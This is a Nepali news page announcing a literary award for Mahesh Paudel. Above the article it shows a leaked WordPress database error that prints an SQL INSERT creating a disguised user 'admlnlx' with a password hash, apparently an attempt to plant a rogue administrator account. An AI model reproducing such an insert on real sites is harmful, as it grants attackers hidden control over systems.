WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTpbL85i2W1lJO21ReVU9VDTYDjlRO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:37:37', '', 'admlnlx', 'admlnlx')

पौडेललाई “सुदीश निरौला स्मृति” साहित्य पुरस्कार – Gaule Khabar

पौडेललाई “सुदीश निरौला स्मृति” साहित्य पुरस्कार

पौडेललाई “सुदीश निरौला स्मृति” साहित्य पुरस्कार

काठमाण्डौ, २४ पौष । पूर्वाञ्चल साहित्य प्रतिष्ठान विराटनगरबाट प्रदान गरिने यस वर्षको सुदीश निरौला स्मृति साहित्य पुरस्कारबाट युवा समालोचक, अनुवादक, कवि, आख्यानकार महेश पौडेललाई पुरस्कृत गरिने भएको छ । पौडेलका विविध विधा र अनुवादका तीनदर्जन भन्दा बढी कृति प्रकाशित छन् ।

सुदीश निरौला ट्रस्टका तर्फबाट टेकमाया निरौला संस्थापक रहनु भएको उक्त पुरस्कारको राशि १५,००० पन्द्रह हजार र सम्मानपत्र रहेको छ । निरौलाको २०७२ सालमा सडक दुर्घटनामा परी निधन भएको थियो । इञ्जिनीयर निरौला साहित्यप्रति रुचि राख्नाका साथै कवितासमेत लेख्ने गर्थे । दिवंगत छोरा सुदीशका नाममा निरौला परिवारबाट यो पुरस्कार संस्थापन गरिएको हो । प्रतिष्ठानका अध्यक्ष प्राज्ञ विवश पोखरेलको अध्यक्षतामा सोमबार बसेको बैठकले यो निर्णय गरेको हो । यसै वर्षदेखि प्रदान गरिने यो पुरस्कार आगामी माघ ६ गते विराटनगरमा प्रदान गरिने छ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका